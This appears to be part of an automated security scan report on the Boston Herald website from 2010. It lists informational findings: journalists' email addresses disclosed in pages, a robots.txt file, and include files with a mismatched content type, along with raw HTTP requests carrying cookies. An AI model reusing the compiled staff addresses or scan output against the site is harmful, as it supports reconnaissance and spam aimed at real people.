11.9. http://bostonherald.com/entertainment/music/general/view/20101107guided_tour_sates_hard-core_fans/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/entertainment/music/general/view/20101107guided_tour_sates_hard-core_fans/srvc=home&position=also

Issue detail

The following email addresses were disclosed in the response:

jed.gott@yahoo.com
jgottlieb@bostonherald.com

Request

Response

11.10. http://bostonherald.com/entertainment/television/general/view/20101107state_of_the_event_as_president_blair_underwood_stumps_for_nbc_drama/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/entertainment/television/general/view/20101107state_of_the_event_as_president_blair_underwood_stumps_for_nbc_drama/srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

mperigard@bostonherald.com

Request

Response

11.11. http://bostonherald.com/mediacenter/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/mediacenter/

Issue detail

The following email addresses were disclosed in the response:

0fcd65_Face_Transplant__trose@heraldinteractive.com
b78c53_Premiere_Hereafter_NY__trose@heraldinteractive.com
cabf78_Dempsey_Challenge__trose@heraldinteractive.com

Request

Response

11.12. http://bostonherald.com/mediacenter/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/mediacenter/index.php

Issue detail

The following email addresses were disclosed in the response:

0fcd65_Face_Transplant__trose@heraldinteractive.com
b78c53_Premiere_Hereafter_NY__trose@heraldinteractive.com
cabf78_Dempsey_Challenge__trose@heraldinteractive.com

Request

Response

11.13. http://bostonherald.com/news/columnists/view/20101105danny_woodheads_tops_on_the_short_list_of_gridiron_hunks/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/columnists/view/20101105danny_woodheads_tops_on_the_short_list_of_gridiron_hunks/srvc=news&position=also

Issue detail

The following email address was disclosed in the response:

lbfalcone@bostonherald.com

Request

Response

11.14. http://bostonherald.com/news/columnists/view/20101107shaunna_oconnell_used_state_reps_own_words_in_defeating_him_justice_prevails_1/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/columnists/view/20101107shaunna_oconnell_used_state_reps_own_words_in_defeating_him_justice_prevails_1/

Issue detail

The following email address was disclosed in the response:

meagan@bostonherald.com

Request

Response

11.15. http://bostonherald.com/news/columnists/view/20101107shaunna_oconnell_used_state_reps_own_words_in_defeating_him_justice_prevails_1/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/columnists/view/20101107shaunna_oconnell_used_state_reps_own_words_in_defeating_him_justice_prevails_1/srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

meagan@bostonherald.com

Request

Response

11.16. http://bostonherald.com/news/opinion/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/opinion/

Issue detail

The following email address was disclosed in the response:

letterstoeditor@bostonherald.com

Request

Response

11.17. http://bostonherald.com/news/politics/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/politics/view.bg

Issue detail

The following email address was disclosed in the response:

jfargen@bostonherald.com

Request

Response

11.18. http://bostonherald.com/news/politics/view/20101106pol_calls_for_ouster_of_states_gop_leader/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/politics/view/20101106pol_calls_for_ouster_of_states_gop_leader/srvc=news&position=also

Issue detail

The following email address was disclosed in the response:

hchabot@bostonherald.com

Request

Response

11.19. http://bostonherald.com/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/format=comments&srvc=home&position=1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/format=comments&srvc=home&position=1

Issue detail

The following email address was disclosed in the response:

jfargen@bostonherald.com

Request

Response

11.20. http://bostonherald.com/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/srvc=home&position=1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/politics/view/20101107tim_cahill_attacks_backfired_independent_slams_republican_strategy/srvc=home&position=1

Issue detail

The following email address was disclosed in the response:

jfargen@bostonherald.com

Request

Response

11.21. http://bostonherald.com/news/regional/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view.bg

Issue detail

The following email address was disclosed in the response:

mszaniszlo@bostonherald.com

Request

Response

11.22. http://bostonherald.com/news/regional/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view.bg

Issue detail

The following email address was disclosed in the response:

smiley@bostonherald.com

Request

Response

11.23. http://bostonherald.com/news/regional/view/20101107bridge_work_hits_ducks_dinosaurs/srvc=news&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view/20101107bridge_work_hits_ducks_dinosaurs/srvc=news&position=also

Issue detail

The following email address was disclosed in the response:

mszaniszlo@bostonherald.com

Request

Response

11.24. http://bostonherald.com/news/regional/view/20101107church-sale_plan_causes_beef/format=comments&srvc=home&position=3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view/20101107church-sale_plan_causes_beef/format=comments&srvc=home&position=3

Issue detail

The following email address was disclosed in the response:

smiley@bostonherald.com

Request

Response

11.25. http://bostonherald.com/news/regional/view/20101107church-sale_plan_causes_beef/srvc=home&position=3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view/20101107church-sale_plan_causes_beef/srvc=home&position=3

Issue detail

The following email address was disclosed in the response:

smiley@bostonherald.com

Request

Response

11.26. http://bostonherald.com/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/format=comments&srvc=home&position=2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/format=comments&srvc=home&position=2

Issue detail

The following email address was disclosed in the response:

mszaniszlo@bostonherald.com

Request

Response

11.27. http://bostonherald.com/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/srvc=home&position=2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/srvc=home&position=2

Issue detail

The following email address was disclosed in the response:

mszaniszlo@bostonherald.com

Request

Response

11.28. http://bostonherald.com/projects/your_tax_dollars.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/projects/your_tax_dollars.bg

Issue detail

The following email address was disclosed in the response:

joed@bostonherald.com

Request

Response

11.29. http://bostonherald.com/projects/your_tax_dollars.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/projects/your_tax_dollars.bg

Issue detail

The following email address was disclosed in the response:

newstips@bostonherald.com

Request

GET /projects/your_tax_dollars.bg HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

11.30. http://bostonherald.com/sports/baseball/red_sox/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/baseball/red_sox/view.bg

Issue detail

The following email address was disclosed in the response:

jtomase@bostonherald.com

Request

Response

11.31. http://bostonherald.com/sports/baseball/red_sox/view/20101107adrian_gonzalez_fit_for_red_sox_eventually/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/baseball/red_sox/view/20101107adrian_gonzalez_fit_for_red_sox_eventually/srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

jtomase@bostonherald.com

Request

Response

11.32. http://bostonherald.com/sports/columnists/view/20101107crushing_hit_on_david_krejci_puts_loss_in_perspective/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/columnists/view/20101107crushing_hit_on_david_krejci_puts_loss_in_perspective/srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

sbuckley@bostonherald.com

Request

Response

11.33. http://bostonherald.com/sports/football/patriots/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/patriots/view.bg

Issue detail

The following email address was disclosed in the response:

irapoport@bostonherald.com

Request

Response

11.34. http://bostonherald.com/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=0

Issue detail

The following email address was disclosed in the response:

irapoport@bostonherald.com

Request

Response

11.35. http://bostonherald.com/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/srvc=home&position=0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/srvc=home&position=0

Issue detail

The following email address was disclosed in the response:

irapoport@bostonherald.com

Request

Response

11.36. http://bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/store/

Issue detail

The following email address was disclosed in the response:

backcopy@bostonherald.com

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:35:08 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>BostonHerald.com</title>
<
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...
<input type="hidden" name="business" value="backcopy@bostonherald.com">
...[SNIP]...

11.37. http://bostonherald.com/track/inside_track/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/inside_track/view.bg

Issue detail

The following email address was disclosed in the response:

trackgals@bostonherald.com

Request

Response

11.38. http://bostonherald.com/track/inside_track/view/20101107cake_boss_is_a_jersey_boy_at_heart/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/inside_track/view/20101107cake_boss_is_a_jersey_boy_at_heart/srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

trackgals@bostonherald.com

Request

Response

11.39. http://bostonherald.com/track/inside_track/view/20101107tracked_down_scott_listfield_terry_francona_joey_fatone__more/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/inside_track/view/20101107tracked_down_scott_listfield_terry_francona_joey_fatone__more/srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

trackgals@bostonherald.com

Request

Response

11.40. http://bostonherald.com/track/inside_track/view/20101107we_hearernie_boch_jr_sean_duffy__more/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/inside_track/view/20101107we_hearernie_boch_jr_sean_duffy__more/srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

trackgals@bostonherald.com

Request

Response

12. Robots.txt file previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/includes/twitter.inc

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: bostonherald.com

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 00:32:08 GMT
Server: Apache
Last-Modified: Wed, 20 Oct 2010 20:58:03 GMT
Accept-Ranges: bytes
Content-Length: 570
Content-Type: text/plain; charset=UTF-8
Connection: close

Robots.txt
# Modified 06/16/2006 by Bill Gaffney
# Herald Interactive Media

User-agent: msnbot
Crawl-delay: 120

User-agent: Slurp
Crawl-delay: 15

User-agent: *
Disallow: /audio
Disal
...[SNIP]...

13. Content type incorrectly stated previous
There are 2 instances of this issue:

/home/includes/twitter.inc
/news/includes/twitter.inc

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

13.1. http://bostonherald.com/home/includes/twitter.inc previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bostonherald.com
Path:	/home/includes/twitter.inc

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain HTML.

Request

GET /home/includes/twitter.inc HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.14.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.4.10.1289175481; RMFD=011PFFPzO101yed8|O1021J6R
If-Modified-Since: Sun, 07 Nov 2010 23:30:09 GMT

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:47:25 GMT
Server: Apache
Last-Modified: Mon, 08 Nov 2010 01:25:08 GMT
Accept-Ranges: bytes
Content-Length: 20938
Content-Type: text/plain; charset=UTF-8
Connection: close


<p><a class="twitter_name sec_track" href="http://twitter.com/Trackgals/" target="_new">Track Gals</a>: are lovin' Nate Robinson's trey at the buz
...[SNIP]...

13.2. http://bostonherald.com/news/includes/twitter.inc previous

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bostonherald.com
Path:	/news/includes/twitter.inc

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain HTML.

Request

GET /news/includes/twitter.inc HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; RMFD=011PFFPzO101yed8; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.11.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 00:20:42 GMT
Server: Apache
Last-Modified: Sun, 07 Nov 2010 22:45:10 GMT
Accept-Ranges: bytes
Content-Length: 1194
Content-Type: text/plain; charset=UTF-8
Connection: close


<p><a class="twitter_name sec_news" href="http://twitter.com/joedwinell/" target="_new">Joe Dwinell</a>: Congress St. Boston ramp to I-93 and Ted Williams
...[SNIP]...

Report generated by Hoyt LLC Research at Mon Nov 08 09:39:19 CST 2010.